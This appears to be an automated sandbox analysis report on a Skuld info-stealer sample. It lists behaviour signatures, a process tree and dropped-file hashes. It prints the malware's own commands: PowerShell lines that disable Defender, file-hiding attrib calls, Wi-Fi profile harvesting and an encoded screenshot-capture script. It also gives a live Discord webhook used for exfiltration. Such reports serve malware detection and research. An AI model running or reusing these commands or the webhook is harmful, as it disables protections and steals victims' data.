Analysis

  • max time kernel
    25s
  • max time network
    24s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20-08-2024 22:35

General

Malware Config

Extracted

Family

skuld

C2

https://discord.com/api/webhooks/1275570777562943619/CfD-pRhASNI97yrXg8BssfRJRJrGeagBhz72dQfdjXc70hZ50lirmSwHec53Jx0RZ28B

Signatures

  • Skuld stealer

    An info stealer written in Go lang.

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Drops file in Drivers directory 3 IoCs
  • Executes dropped EXE 4 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 1 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Detects videocard installed 1 TTPs 2 IoCs

    Uses WMIC.exe to determine videocard installed.

  • GoLang User-Agent 1 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Modifies system certificate store 2 TTPs 6 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 46 IoCs
  • Views/modifies file attributes 1 TTPs 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://f.sed.lol/files/foqrs.exe
    1⤵
      PID:2948
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --field-trial-handle=4384,i,3210801877307184477,8078594481454001567,262144 --variations-seed-version --mojo-platform-channel-handle=3744 /prefetch:1
      1⤵
        PID:3112
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --field-trial-handle=3120,i,3210801877307184477,8078594481454001567,262144 --variations-seed-version --mojo-platform-channel-handle=2584 /prefetch:1
        1⤵
          PID:220
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=5356,i,3210801877307184477,8078594481454001567,262144 --variations-seed-version --mojo-platform-channel-handle=5392 /prefetch:8
          1⤵
            PID:4744
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --field-trial-handle=5360,i,3210801877307184477,8078594481454001567,262144 --variations-seed-version --mojo-platform-channel-handle=5432 /prefetch:8
            1⤵
              PID:1680
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --field-trial-handle=6068,i,3210801877307184477,8078594481454001567,262144 --variations-seed-version --mojo-platform-channel-handle=6176 /prefetch:8
              1⤵
                PID:4276
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --field-trial-handle=6120,i,3210801877307184477,8078594481454001567,262144 --variations-seed-version --mojo-platform-channel-handle=6200 /prefetch:1
                1⤵
                  PID:4852
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --field-trial-handle=6588,i,3210801877307184477,8078594481454001567,262144 --variations-seed-version --mojo-platform-channel-handle=6612 /prefetch:8
                  1⤵
                    PID:1624
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --field-trial-handle=6660,i,3210801877307184477,8078594481454001567,262144 --variations-seed-version --mojo-platform-channel-handle=6776 /prefetch:8
                    1⤵
                      PID:4828
                    • C:\Users\Admin\Downloads\foqrs.exe
                      "C:\Users\Admin\Downloads\foqrs.exe"
                      1⤵
                      • Suspicious use of WriteProcessMemory
                      PID:340
                      • C:\Windows\system32\cmd.exe
                        cmd.exe /C start /b C:\Users\Admin\AppData\Local\Temp\4e2b28e3-d647-12c6-249f-cd4838709b5d.exe
                        2⤵
                        • Suspicious use of WriteProcessMemory
                        PID:4848
                        • C:\Users\Admin\AppData\Local\Temp\4e2b28e3-d647-12c6-249f-cd4838709b5d.exe
                          C:\Users\Admin\AppData\Local\Temp\4e2b28e3-d647-12c6-249f-cd4838709b5d.exe
                          3⤵
                          • Drops file in Drivers directory
                          • Executes dropped EXE
                          • Adds Run key to start application
                          • Maps connected drives based on registry
                          • Modifies system certificate store
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:432
                          • C:\Windows\system32\attrib.exe
                            attrib +h +s C:\Users\Admin\AppData\Local\Temp\4e2b28e3-d647-12c6-249f-cd4838709b5d.exe
                            4⤵
                            • Views/modifies file attributes
                            PID:1756
                          • C:\Windows\system32\attrib.exe
                            attrib +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
                            4⤵
                            • Views/modifies file attributes
                            PID:4064
                          • C:\Windows\System32\Wbem\wmic.exe
                            wmic csproduct get UUID
                            4⤵
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1892
                          • C:\Windows\System32\Wbem\wmic.exe
                            wmic path win32_VideoController get name
                            4⤵
                            • Detects videocard installed
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1612
                          • C:\Windows\System32\Wbem\wmic.exe
                            wmic os get Caption
                            4⤵
                              PID:3884
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              powershell -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\4e2b28e3-d647-12c6-249f-cd4838709b5d.exe
                              4⤵
                              • Command and Scripting Interpreter: PowerShell
                              • Suspicious behavior: EnumeratesProcesses
                              PID:4828
                            • C:\Windows\System32\Wbem\wmic.exe
                              wmic cpu get Name
                              4⤵
                                PID:1892
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                4⤵
                                • Command and Scripting Interpreter: PowerShell
                                • Suspicious behavior: EnumeratesProcesses
                                PID:4644
                              • C:\Windows\System32\Wbem\wmic.exe
                                wmic path win32_VideoController get name
                                4⤵
                                • Detects videocard installed
                                PID:3428
                              • C:\Windows\System32\Wbem\wmic.exe
                                wmic csproduct get UUID
                                4⤵
                                  PID:5188
                                • C:\Windows\system32\attrib.exe
                                  attrib -r C:\Windows\System32\drivers\etc\hosts
                                  4⤵
                                  • Drops file in Drivers directory
                                  • Views/modifies file attributes
                                  PID:5328
                                • C:\Windows\system32\attrib.exe
                                  attrib +r C:\Windows\System32\drivers\etc\hosts
                                  4⤵
                                  • Drops file in Drivers directory
                                  • Views/modifies file attributes
                                  PID:5356
                                • C:\Windows\system32\netsh.exe
                                  netsh wlan show profiles
                                  4⤵
                                  • Event Triggered Execution: Netsh Helper DLL
                                  • System Network Configuration Discovery: Wi-Fi Discovery
                                  PID:5376
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                  4⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:5520
                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\luzzq4jw\luzzq4jw.cmdline"
                                    5⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:5652
                                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7AD8.tmp" "c:\Users\Admin\AppData\Local\Temp\luzzq4jw\CSC4B4EAAADF269440D89AFABC5A0EFB6F.TMP"
                                      6⤵
                                        PID:5688
                            • C:\Users\Admin\Downloads\foqrs.exe
                              "C:\Users\Admin\Downloads\foqrs.exe"
                              1⤵
                              • Suspicious use of WriteProcessMemory
                              PID:3644
                              • C:\Windows\system32\cmd.exe
                                cmd.exe /C start /b C:\Users\Admin\AppData\Local\Temp\44f14b31-554a-300b-655e-fb6972dcc7bb.exe
                                2⤵
                                • Suspicious use of WriteProcessMemory
                                PID:4644
                                • C:\Users\Admin\AppData\Local\Temp\44f14b31-554a-300b-655e-fb6972dcc7bb.exe
                                  C:\Users\Admin\AppData\Local\Temp\44f14b31-554a-300b-655e-fb6972dcc7bb.exe
                                  3⤵
                                  • Executes dropped EXE
                                  PID:3936
                            • C:\Users\Admin\Downloads\foqrs.exe
                              "C:\Users\Admin\Downloads\foqrs.exe"
                              1⤵
                              • Suspicious use of WriteProcessMemory
                              PID:2456
                              • C:\Windows\system32\cmd.exe
                                cmd.exe /C start /b C:\Users\Admin\AppData\Local\Temp\070f0fc0-6118-9d21-022e-8c239b4d0e3b.exe
                                2⤵
                                  PID:5204
                                  • C:\Users\Admin\AppData\Local\Temp\070f0fc0-6118-9d21-022e-8c239b4d0e3b.exe
                                    C:\Users\Admin\AppData\Local\Temp\070f0fc0-6118-9d21-022e-8c239b4d0e3b.exe
                                    3⤵
                                    • Executes dropped EXE
                                    PID:5264
                              • C:\Users\Admin\Downloads\foqrs.exe
                                "C:\Users\Admin\Downloads\foqrs.exe"
                                1⤵
                                • Suspicious use of WriteProcessMemory
                                PID:5408
                                • C:\Windows\system32\cmd.exe
                                  cmd.exe /C start /b C:\Users\Admin\AppData\Local\Temp\99cf3c46-b3c1-1eb4-0272-271a134746d5.exe
                                  2⤵
                                    PID:5468
                                    • C:\Users\Admin\AppData\Local\Temp\99cf3c46-b3c1-1eb4-0272-271a134746d5.exe
                                      C:\Users\Admin\AppData\Local\Temp\99cf3c46-b3c1-1eb4-0272-271a134746d5.exe
                                      3⤵
                                      • Executes dropped EXE
                                      PID:5500
                                • C:\Windows\system32\taskmgr.exe
                                  "C:\Windows\system32\taskmgr.exe" /4
                                  1⤵
                                    PID:5756
                                  • C:\Users\Admin\Downloads\foqrs.exe
                                    "C:\Users\Admin\Downloads\foqrs.exe"
                                    1⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:5812
                                    • C:\Windows\system32\cmd.exe
                                      cmd.exe /C start /b C:\Users\Admin\AppData\Local\Temp\1a255709-d337-6306-b4f5-829ba33fb3d8.exe
                                      2⤵
                                        PID:5872

                                    Network

                                    MITRE ATT&CK Enterprise v15

                                    Replay Monitor

                                    Loading Replay Monitor...

                                    Downloads

                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                      Filesize

                                      2KB

                                      MD5

                                      d85ba6ff808d9e5444a4b369f5bc2730

                                      SHA1

                                      31aa9d96590fff6981b315e0b391b575e4c0804a

                                      SHA256

                                      84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                      SHA512

                                      8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                      Filesize

                                      944B

                                      MD5

                                      bd5940f08d0be56e65e5f2aaf47c538e

                                      SHA1

                                      d7e31b87866e5e383ab5499da64aba50f03e8443

                                      SHA256

                                      2d2f364c75bd2897504249f42cdf1d19374f5230aad68fa9154ea3d03e3031a6

                                      SHA512

                                      c34d10c7e07da44a180fae9889b61f08903aa84e8ddfa80c31c272b1ef9d491b8cec6b8a4c836c3cb1583fe8f4955c6a8db872515de3a9e10eae09610c959406

                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                      Filesize

                                      944B

                                      MD5

                                      fd98baf5a9c30d41317663898985593b

                                      SHA1

                                      ea300b99f723d2429d75a6c40e0838bf60f17aad

                                      SHA256

                                      9d97a5bbc88fdcceac25f293383f7e5ce242675460ffbfb2ee9090870c034e96

                                      SHA512

                                      bf4dbbd671b5d7afb326622a7c781f150860294d3dba7160330046c258c84a15981c70e50d84dc7faaa7cc8b8c90bf8df818b3f2d3806a8a3671dfe5e38fe7b0

                                    • C:\Users\Admin\AppData\Local\Temp\4e2b28e3-d647-12c6-249f-cd4838709b5d.exe

                                      Filesize

                                      9.9MB

                                      MD5

                                      1794788462c41d14e2659260f134a304

                                      SHA1

                                      e977afbac54e557b917abe2604eddee4c72fe297

                                      SHA256

                                      8f2f5de00ac8de98139e3c9a802bedae0368714ea3714eba37ef5778bff86a9d

                                      SHA512

                                      941d567e3316a4388d3554b14a1bf9af8254475811559b253dc9428b1e9c2de4d7d1f307fec9719b2c5968d3893d204d5d189fe312afe5913ff17572bbae2aff

                                    • C:\Users\Admin\AppData\Local\Temp\BmbF6Os6u9\Display (1).png

                                      Filesize

                                      40KB

                                      MD5

                                      673704565f1113201582c3b0a75df94d

                                      SHA1

                                      ab2979a9aacaca9693689f7ae07c0db4d1314bc4

                                      SHA256

                                      7708f47e1efb7af4f55efd321cf3ad9184fc449882fb6b42a58cfe81ed2bad4d

                                      SHA512

                                      9d4d5d0fdc99ff3e97f679f88e01a7bf80698e4d15d45d99d48dc994212ffea3e029ab66470e42e31ef0ccb36960715265e870cd5a52b3cad044d3d4e8dacfdc

                                    • C:\Users\Admin\AppData\Local\Temp\RES7AD8.tmp

                                      Filesize

                                      1KB

                                      MD5

                                      0a234651b2ef6dad027359d3be2085e5

                                      SHA1

                                      6de3999afbdf7bf7a2623b30ab410c77f9d98c86

                                      SHA256

                                      9c777228c8ffb80643bec0e9be3f68fa9f18b8e86b254aac02b3a5c8360d41d7

                                      SHA512

                                      110a7298dd23989cc84323209baaa4642d97b2686ccaf2992b087c47ffdeed3a7b38e4130a3aa9b50407be82a321cac6f4550c48596807a53daf6880397c034d

                                    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xjecowjo.aws.ps1

                                      Filesize

                                      60B

                                      MD5

                                      d17fe0a3f47be24a6453e9ef58c94641

                                      SHA1

                                      6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                      SHA256

                                      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                      SHA512

                                      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                    • C:\Users\Admin\AppData\Local\Temp\luzzq4jw\luzzq4jw.dll

                                      Filesize

                                      4KB

                                      MD5

                                      54ef1a54c6a268c12222590949ea2078

                                      SHA1

                                      2e273e40262c5180557c14b1896f3c7c24b78759

                                      SHA256

                                      5cd4a16d4347b70e3c23bbddc575b00088f9148f616357419ccb3321ab879242

                                      SHA512

                                      b93ab6549f504731b29189f9b385a6b0ad4675090d004a16c1024e202f41c1c135cf831e5e46763c2418a03ee3c62d305b182f135bde89a4dd724012d32918f8

                                    • C:\Windows\System32\drivers\etc\hosts

                                      Filesize

                                      2KB

                                      MD5

                                      6e2386469072b80f18d5722d07afdc0b

                                      SHA1

                                      032d13e364833d7276fcab8a5b2759e79182880f

                                      SHA256

                                      ade1813ae70d7da0bfe63d61af8a4927ed12a0f237b79ce1ac3401c0646f6075

                                      SHA512

                                      e6b96f303935f2bbc76f6723660b757d7f3001e1b13575639fb62d68a734b4ce8c833b991b2d39db3431611dc2cacde879da1aecb556b23c0d78f5ee67967acb

                                    • \??\c:\Users\Admin\AppData\Local\Temp\luzzq4jw\CSC4B4EAAADF269440D89AFABC5A0EFB6F.TMP

                                      Filesize

                                      652B

                                      MD5

                                      0a9ecc3dca540bbb9c0b6e817c44cddd

                                      SHA1

                                      87251a5b459498edd2e2bc18c5490ffc4d68deea

                                      SHA256

                                      c6b00d6711746eb841aa26e1d73d9d8b7115dcd463dbd60bbd77f5a3f4dd85ad

                                      SHA512

                                      56492a51db6531dd565de378f779460198d14922c133fa8d4bba87cb75312c35f5376466b5b2c517400dce333aa83a995689ef06719aa0bb3acd326cd8d481cc

                                    • \??\c:\Users\Admin\AppData\Local\Temp\luzzq4jw\luzzq4jw.0.cs

                                      Filesize

                                      1004B

                                      MD5

                                      c76055a0388b713a1eabe16130684dc3

                                      SHA1

                                      ee11e84cf41d8a43340f7102e17660072906c402

                                      SHA256

                                      8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

                                      SHA512

                                      22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

                                    • \??\c:\Users\Admin\AppData\Local\Temp\luzzq4jw\luzzq4jw.cmdline

                                      Filesize

                                      607B

                                      MD5

                                      db18dfa93c2c83a1a551483af21d459f

                                      SHA1

                                      3f1a0d14c702332756b49919df49f4164b28a63f

                                      SHA256

                                      9fc64ec6a6d0642c8560f6fbe6f99ff36708e0fe189ebc00b08d602ef10fee45

                                      SHA512

                                      1368995c3328bfd3ed4754eb63b665e1ceb9f147afda9f4b177046d5c867ef593c2b527838afe01e6279dd7a9af3ab31d17dc71457cb37a86dc919477a91dbf3

                                    • memory/4828-12-0x000001BCF92C0000-0x000001BCF92E2000-memory.dmp

                                      Filesize

                                      136KB

                                    • memory/5520-82-0x000001E7F9610000-0x000001E7F9618000-memory.dmp

                                      Filesize

                                      32KB